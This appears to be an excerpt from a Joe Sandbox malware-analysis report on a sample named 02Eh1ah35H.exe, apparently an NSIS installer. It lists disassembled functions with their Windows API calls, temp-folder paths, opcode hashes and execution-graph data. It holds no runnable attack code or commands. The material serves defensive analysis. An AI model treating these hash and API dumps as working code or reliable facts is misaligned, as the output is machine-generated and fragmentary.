                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseValuelstrlen
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsbF672.tmp
                                                                                                                                                                                • API String ID: 2655323295-4002028044
                                                                                                                                                                                • Opcode ID: 8ad9f413285597f4ac34c444e8e090e563bd286de5b8d8eab0abce92a9a2370d
                                                                                                                                                                                • Instruction ID: b5ab21fa5db9dca98c90a3684f9c4c1c94415ceb852b3cd4d8f68548cc0c41e7
                                                                                                                                                                                • Opcode Fuzzy Hash: 8ad9f413285597f4ac34c444e8e090e563bd286de5b8d8eab0abce92a9a2370d
                                                                                                                                                                                • Instruction Fuzzy Hash: D311AF71E00108BEEB00AFA5CE49AAE7BB9EF44314F20443AF514B71D1D6B88D409668
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                                                                                                                                                                  • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,76F43420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                                                                                                                                                                  • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                                                                                                                                                                  • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbF672.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,76F43420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E24
                                                                                                                                                                                • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,76F43420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F43420,C:\Users\user\AppData\Local\Temp\), ref: 00405E34
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsbF672.tmp
                                                                                                                                                                                • API String ID: 3248276644-3573784972
                                                                                                                                                                                • Opcode ID: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                                                                                                                                                                • Instruction ID: 3e737dd218ce82e1fa1fef2ae0b63742eeb13cb079fe623d21add3619189c6ea
                                                                                                                                                                                • Opcode Fuzzy Hash: cded0a6966890639b687aa66a4455a295a884498cbe0599bea4925404aa51844
                                                                                                                                                                                • Instruction Fuzzy Hash: B2F0A435104E5115D632333A9D09BEF1558CE86718B19863BF8A2B22D2DB3C8A539DBE
                                                                                                                                                                                APIs
                                                                                                                                                                                • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,76F43420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,76F43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                                                                                                                                                                • CharNextW.USER32(00000000), ref: 00405D81
                                                                                                                                                                                • CharNextW.USER32(00000000), ref: 00405D99
                                                                                                                                                                                Strings
                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nsbF672.tmp, xrefs: 00405D6F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharNext
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsbF672.tmp
                                                                                                                                                                                • API String ID: 3213498283-4002028044
                                                                                                                                                                                • Opcode ID: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                                                                                                                                                                • Instruction ID: 839f6a4cd7818f8bbcc29dd9d6e935739f9a8baf6e4a15472bca77c663bd0c43
                                                                                                                                                                                • Opcode Fuzzy Hash: a494e05d27702b27be76eb2108b1f7c475580a471c546fdda9206c4fb56a95c9
                                                                                                                                                                                • Instruction Fuzzy Hash: 1FF09022920F1296DB3177545C4DE7B5BB8EF54760B00C43BE601B72C1E3B84C818EAA
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CC9
                                                                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040348F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00405CD3
                                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405CE5
                                                                                                                                                                                Strings
                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                • API String ID: 2659869361-3355392842
                                                                                                                                                                                • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                                                                                                                                • Instruction ID: 20018de61182ae54b5e078598b4ece42ca391df12eccfc729252e8f5514d5294
                                                                                                                                                                                • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                                                                                                                                                                • Instruction Fuzzy Hash: 78D0A731101A30AAD1117B448D04CDF629CFE85304341403BF202B30A2C77C1D5387FD
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbF672.tmp\System.dll), ref: 0040268D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsbF672.tmp$C:\Users\user\AppData\Local\Temp\nsbF672.tmp\System.dll
                                                                                                                                                                                • API String ID: 1659193697-365457192
                                                                                                                                                                                • Opcode ID: 40ff2413c92c622196d5d0400a29426247bc2c649eed07ad329af60aa5212f4d
                                                                                                                                                                                • Instruction ID: b6edfc9972aa644188961ebceaa73704b58c28032334693464610e5b401fed5f
                                                                                                                                                                                • Opcode Fuzzy Hash: 40ff2413c92c622196d5d0400a29426247bc2c649eed07ad329af60aa5212f4d
                                                                                                                                                                                • Instruction Fuzzy Hash: CF110D71A10305AACB00ABB08F4AAAE77719F55748F61443FF502F61C1D6FC4951565E
                                                                                                                                                                                APIs
                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402FE2
                                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                • Opcode ID: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                                                                                                                                                                • Instruction ID: 8c281f3aa7e88f802b7d8bba4993e69035ed424970cff038758a163d63a680ad
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e41244d60e94df7afa5422e741b36603cd51d1290bb4582c8306ab25b36019d
                                                                                                                                                                                • Instruction Fuzzy Hash: 3AF0BE30506221ABC2616F60FE0CA8B3B78FB44B51705C83BF101F11E4CB3808819B9D
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 004053F9
                                                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 0040544A
                                                                                                                                                                                  • Part of subcall function 00404390: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                                • Opcode ID: 63f07d3bfe87a358a7903b8c4052eed0806f84f2521abbc8f8e3291c3210bf1f
                                                                                                                                                                                • Instruction ID: 5f6fd1bc1cb6019f344e496d8f57972e5ce8a9055d244d91c322c77d39ebf2aa
                                                                                                                                                                                • Opcode Fuzzy Hash: 63f07d3bfe87a358a7903b8c4052eed0806f84f2521abbc8f8e3291c3210bf1f
                                                                                                                                                                                • Instruction Fuzzy Hash: 63018431101608AFEF205F11DD80BDB3725EB95355F508037FA00762E1C77A8C919A6D
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,007A0F28,00000000,?,?,Call,?,?,0040654B,80000002), ref: 00406302
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,0040654B,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F28), ref: 0040630D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                • String ID: Call
                                                                                                                                                                                • API String ID: 3356406503-1824292864
                                                                                                                                                                                • Opcode ID: e4d53d9119acc97e3ded4dfe14f35fc16891fc75654ca884eca869e70a2bebda
                                                                                                                                                                                • Instruction ID: 373679b9ec00f947e58de2b720fd419a4882b2706591ab80caa015ae1ce90e84
                                                                                                                                                                                • Opcode Fuzzy Hash: e4d53d9119acc97e3ded4dfe14f35fc16891fc75654ca884eca869e70a2bebda
                                                                                                                                                                                • Instruction Fuzzy Hash: 56017C72510209EADF218F65CC09EDB3BA8FF54364F01803AFD5AA2190D778D964DBA4
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F50,Error launching installer), ref: 00405A00
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405A0D
                                                                                                                                                                                Strings
                                                                                                                                                                                • Error launching installer, xrefs: 004059EA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                                                • Opcode ID: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                                                                                                                                                                • Instruction ID: 2b341ff16c6abf5d503a25303b32c86a9a78efd9c2a610832e0bce27d8c53e5f
                                                                                                                                                                                • Opcode Fuzzy Hash: c4e46f1f673fd3826d078202ae771a3f9877dbb6e8e98e36d3575ddcb335b3d8
                                                                                                                                                                                • Instruction Fuzzy Hash: F3E0BFF46002097FEB109F64ED05F7B77ACEB44644F004525BD54F6150D7B999148A7D
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,76F43420,00000000,C:\Users\user\AppData\Local\Temp\,00403A00,00403816,00000007,?,00000007,00000009,0000000B), ref: 00403A42
                                                                                                                                                                                • GlobalFree.KERNEL32(00B3DCE8), ref: 00403A49
                                                                                                                                                                                Strings
                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A28
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                • API String ID: 1100898210-3355392842
                                                                                                                                                                                • Opcode ID: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                                                                                                                                                                • Instruction ID: 10b089f61d7fd26560bcfb3f790e8945b6a0be01d7b58778b04adbc7300f8739
                                                                                                                                                                                • Opcode Fuzzy Hash: 6ef17ecbb981fa3a9d26a37a654407d639bd202e425e8d1c53e2791914a5cf50
                                                                                                                                                                                • Instruction Fuzzy Hash: 64E0123360112057C6215F45FE0475ABB7D6F49B26F06803BE9C0BB26087785C838FD8
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\02Eh1ah35H.exe,C:\Users\user\Desktop\02Eh1ah35H.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D15
                                                                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403081,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\02Eh1ah35H.exe,C:\Users\user\Desktop\02Eh1ah35H.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405D25
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                                                                • API String ID: 2709904686-3370423016
                                                                                                                                                                                • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                                                                                                                                • Instruction ID: 3b4219a6871f3e4e2040e57eeeef2aaac809f1ec38f5d31038b50c09059f2d31
                                                                                                                                                                                • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                                                                                                                                                                                • Instruction Fuzzy Hash: 97D05EB34109209AE3127704DC0599F73E8EF5530074A8467E541A61A5D7785C818AAC
                                                                                                                                                                                APIs
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6FDF116A
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6FDF11C7
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6FDF11D9
                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 6FDF1203
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28269523122.000000006FDF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FDF0000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28269495512.000000006FDF0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28269551381.000000006FDF4000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                • Associated: 00000000.00000002.28269577474.000000006FDF6000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6fdf0000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                                                                • Opcode ID: cb66843cc73f2ca024eb3f4eabef0c613ad6003faf216bbc09b7b108ede6c6d0
                                                                                                                                                                                • Instruction ID: a20fddbad3b80d041edb03ae310d726f6a471b3388103de1b76934ca42f9f458
                                                                                                                                                                                • Opcode Fuzzy Hash: cb66843cc73f2ca024eb3f4eabef0c613ad6003faf216bbc09b7b108ede6c6d0
                                                                                                                                                                                • Instruction Fuzzy Hash: 4E3192F6903701DFEB408FB8E945E657BE8FB46324B0A461AE844D7250E734F9529760
                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E59
                                                                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E71
                                                                                                                                                                                • CharNextA.USER32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E82
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E8B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                • Instruction ID: a1795947179755a411c98c1569971d2b6f4e38ea7894d212e8297337e4f71977
                                                                                                                                                                                • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                • Instruction Fuzzy Hash: E2F06231504514FFD7129BA5DD409AEBBA8EF06250B2540BAE884FB250D674DF029BE9

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:0%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:100%
                                                                                                                                                                                Total number of Nodes:1
                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                execution_graph 59152 33372b90 LdrInitializeThunk

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 4 333734e0-333734ec LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: e85343e005927d33794c21f3858b45066f9d3944e5c38fc9b5efd7c1fccc03ae
                                                                                                                                                                                • Instruction ID: 89256e0359875c7968e40a68dc14a6fc617bc9d8b1b195cb90dfad76673fc5d9
                                                                                                                                                                                • Opcode Fuzzy Hash: e85343e005927d33794c21f3858b45066f9d3944e5c38fc9b5efd7c1fccc03ae
                                                                                                                                                                                • Instruction Fuzzy Hash: AA90023561610842D50066584614706100587D0203F61CC16A0414D28DC7A5895975A2

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 33372b90-33372b9c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 14a541be96a05e3cc73b75f9db8b18a9514eaf3bd39f72aabd2d82e8227674aa
                                                                                                                                                                                • Instruction ID: e0a9ba194e23b6d40ad356a3fd9dd07b086402c730a2df8ae5ef4a7464217dc8
                                                                                                                                                                                • Opcode Fuzzy Hash: 14a541be96a05e3cc73b75f9db8b18a9514eaf3bd39f72aabd2d82e8227674aa
                                                                                                                                                                                • Instruction Fuzzy Hash: 6890023521208C42D5106658850474A000587D0303F55CC16A4414E18DC6A588997121

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 1 33372bc0-33372bcc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 6841672f677fb03bb6094480c2d676f90d78890a9996d325ee41cac69b64c465
                                                                                                                                                                                • Instruction ID: 2aa4bfde3eedea96f1e4a5f7a6f6190bcee2acd3249896adbe7189c1d82a338e
                                                                                                                                                                                • Opcode Fuzzy Hash: 6841672f677fb03bb6094480c2d676f90d78890a9996d325ee41cac69b64c465
                                                                                                                                                                                • Instruction Fuzzy Hash: AD90023521200842D5006A985508646000587E0303F51D816A5014D15EC67588997131

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 3 33372eb0-33372ebc LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: e2ee9ac14c307d39e324b38ee4647063dfcf51f0c92b52f3121d4c9c94b82872
                                                                                                                                                                                • Instruction ID: a40695680166063c33baf03c1c3c2aadba8789449dee8ad46a025272af770f01
                                                                                                                                                                                • Opcode Fuzzy Hash: e2ee9ac14c307d39e324b38ee4647063dfcf51f0c92b52f3121d4c9c94b82872
                                                                                                                                                                                • Instruction Fuzzy Hash: 0990023521240842D5006658491470B000587D0303F51C816A1154D15DC63588597571

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 2 33372d10-33372d1c LdrInitializeThunk
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 9c23f29512178caddf34440817f547ac8f2f1f2dcee38aa5f14819d6e23c7090
                                                                                                                                                                                • Instruction ID: 37730db6586e83d4a150e943b06a2039f50dc50b8cf10378242e8ec28b968864
                                                                                                                                                                                • Opcode Fuzzy Hash: 9c23f29512178caddf34440817f547ac8f2f1f2dcee38aa5f14819d6e23c7090
                                                                                                                                                                                • Instruction Fuzzy Hash: 7190023521200853D51166584604707000987D0243F91CC17A0414D18DD666895AB121

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, Offset: 33300000, based on PE: true
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.0000000033429000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_33300000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                                                • String ID: $ $0
                                                                                                                                                                                • API String ID: 3446177414-3352262554
                                                                                                                                                                                • Opcode ID: f548a9c7ac8aa558fd1ba4fa3db8858263a40421fd50b1a830297813aa4dc36a
                                                                                                                                                                                • Instruction ID: bfa384ca2a2fd5e3e4afac86f04b8b367518c150807af0f64d921fafaed4c152
                                                                                                                                                                                • Opcode Fuzzy Hash: f548a9c7ac8aa558fd1ba4fa3db8858263a40421fd50b1a830297813aa4dc36a
                                                                                                                                                                                • Instruction Fuzzy Hash: B73235B6A083818FE350CF68C884B5BBBE9BF88744F04892EF599C7250D775D949CB52

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 333A5215, 333A52A1, 333A5324
                                                                                                                                                                                • 8, xrefs: 333A50EE
                                                                                                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 333A52D9
                                                                                                                                                                                • corrupted critical section, xrefs: 333A52CD
                                                                                                                                                                                • undeleted critical section in freed memory, xrefs: 333A5236
